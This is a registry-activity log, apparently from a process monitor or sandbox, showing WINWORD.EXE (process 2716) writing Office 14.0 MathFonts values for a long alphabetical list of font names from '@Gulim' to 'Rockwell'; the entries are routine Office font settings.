0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
1
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Fixedsys
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Sans Serif
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Serif
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
0
2716
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
0
2716
WINWORD.EXE
write
